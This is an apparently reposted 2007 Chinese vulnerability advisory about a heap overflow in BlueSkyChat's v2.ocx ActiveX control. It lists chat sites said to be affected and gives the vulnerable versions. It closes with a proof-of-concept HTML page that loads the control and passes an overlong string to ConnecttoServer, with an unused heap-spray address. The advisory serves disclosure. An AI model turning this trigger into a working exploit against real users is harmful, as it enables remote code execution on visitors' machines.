数千万聊天用户遇到挂马危险--BlueSkyCat ActiveX远程代码执行漏

来源:岁月联盟 编辑:zhuzhu 时间:2007-08-11
数千万聊天用户遇到挂马危险--BlueSkyCat ActiveX远程代码执行漏洞    近来Code Audit Labs发现几处v2.ocx ActiveX的高危漏洞,远程安全者可能利用此漏洞控制用户机器。

  细节:
=====

  BlueSkyChat所安装的v2.ocx控件中的ConnecttoServer函数没有正确验证用户输入
参数,如果用户受骗访问了恶意页面的话,就可能触发堆溢出,导致执行任意指令。
从而控制安装有受影响版本的BlueSkyChat软件的用户机器。

以下您的客户的客户的机器都会受到影响
碧聊         http://www.bliao.com
QQ聊         http://www.qqliao.com
七聊         http://www.7liao.com
好聊         http://www.haoliao.net
我要聊         http://chat.51liao.net
圣域佛教      http://www.heshang.net
喜满你         http://vchat.xicn.net
CN104         http://www.cn104.com
学聊         http://www.liao-tian.com
情聊         http://www.aliao.net
快聊         http://www.kuailiao.com
模特聊         http://www.mtliao.com
北国娱乐网    http://www.pj0427.com
维语聊         http://chat.uighur.cn
舞魅聊         http://www.wmliao.com


受影响版本:
===========
v2.ocx  version 8.1.2.0(当前最新版本) 和以前版本

测试代码:
========
<html>
<head>
<OBJECT ID="com" CLASSID="CLSID:{2EA6D939-4445-43F1-A12B-8CB3DDA8B855}">
</OBJECT>
</head>
<body>
<SCRIPT language="javascript">

function ClickForRunCalc()
{
    var heapSprayToAddress = 0x0d0d0d0d;

    var payLoadCode = "A" ;
    while (payLoadCode.length <= 10000) payLoadCode+='A';
    com.ConnecttoServer("1",payLoadCode,"3","4","5");
}
</script>
<button onclick="javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>